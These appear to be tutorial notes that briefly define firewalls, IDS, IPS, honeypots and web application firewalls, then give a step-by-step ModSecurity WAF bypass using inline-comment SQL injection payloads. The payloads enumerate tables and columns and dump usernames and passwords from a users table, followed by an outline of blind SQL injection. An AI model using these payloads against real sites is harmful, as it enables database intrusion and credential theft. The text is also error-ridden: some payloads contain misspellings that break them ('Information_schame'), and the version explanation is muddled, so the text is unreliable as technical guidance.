Firewall IDS IPS Intro of WAF Bypassing Blind Based Sql Injection
= FIREWALL, IDS, IPS
= INTRO TO WAF, WAF BYPASSING
= BLIND BASED SQL INJECTION
= Firewalls : These are the network endpoint security components which helps us in filtering of network traffic congesion via inbound and outbound rules.
TWO TYPES :
– SOFTWARE BASED FIREWALLS : having limited rules and most of them are openm source. Eg. Windows Firewalls, IPTables etc.
– HARDWARE BASED FIREWALLS : These are having advanced features with more security and are paid. Eg. Sophos Firewall, Cyberroam, Endian, Fortinet etc.
IDS stands Intrusion DEtection System, it is a software or a hardware based program which detects every suspicious activity and create a log for it. It can also create the logs and send immediately to the Network Administrator so that they can find out that there is a Intruder in our network.
It can be determined in different types such as NIDS (Network IDS), HIDS (Host IDS), WIDS(Wireless IDS) etc
IPS stands for Intrusion Prevention System, it acts and works by preventing the intruders which have been doing malicious and illegal activities in the Nretwork or with there clients immediately.
EG. of IDS and IPS – SNORT etc.
A honeypot is a attracting and luring technique to fetch and traps a Hacker, Attacker or a victim which can be a WEb Application, a Network System or a Access Point(Wireless Connection) which seems like absolutely normal but is created to trap the Attackers.
INTRDUCTION TO WAF – A web application firewall is just like a network firewall works with the rulesets of inbound and outbound but not for a network, and works for a web application or a web site. A WAF filters the HTTP, HTTPS traffic along with the communication handeling done by TCP/UDP and also works with some advanced mitigation programs like securing OWASP Top 10.
FOR EG . MOD SECURITY
INSTALLING AND CONFIGURING MOD SECURITY WAF
OS – UBUNTU 14.04
Mod Security WAF
BYPASSING MOD WAF
= Finding GET Method.
= Generating SQL Syntax Error by (‘)
= To check the number of columns by ORDER BY.
= Getting Vulnerable Columns UNION SELECT.
= Getting a error in finding out the Vulnerable Columns.
Inline Executable Comments
Union – /*!UniOn*/
Select – /*!SelECt*/
But these will only work if the DB version is less than 6. The version is always be in Decimal Notation, we can write them by removing the period (.) also. Eg. 5.00.00 -> 50000
So for finding out that the Inline Comments can work or not, we have to put the Database Version with Union Select like :
= php?id=1′ /*!50000UniOn*/ /*!50000SelECt*/ 1,2–+
= To get the database and version :
/*!50000UniOn*/ /*!50000SelECt*/ database(),version()–+
= To get the table name from information_schema :
/*!50000UniOn*/ /*!50000SelECt*/ 1,table_name from /*!50000Information_schame.tables*/–+
= To get the column name from users table :
/*!50000UniOn*/ /*!50000SelECt*/ 1,column_name from /*!50000Information_schame.columns*/ where table_name=”users”–+
= To get the data:
/*!50000UniOn*/ /*!50000SelECt*/ 1,/*!50000Group_concat(User_id,Users,Password)*/ from users–+
BLIND BASED SQL INJECTION
Blind Based sql injection is a tyupe of attack vector of sql injection which doesn’t gives us any SQL Syntax Error, but can be possibly done.
If there is some data in the web qapplication, it will show the data, else it will reload the same page.
1. Finding the GET Method
2. Finding the vulnerability by (‘)
3. Finding the number of columns in the database by doing ORDER BY in any ID in which we get Data.
4. Finding the Vulnerable column by Union Select.
5. Same steps further as Union Based SQL Injection.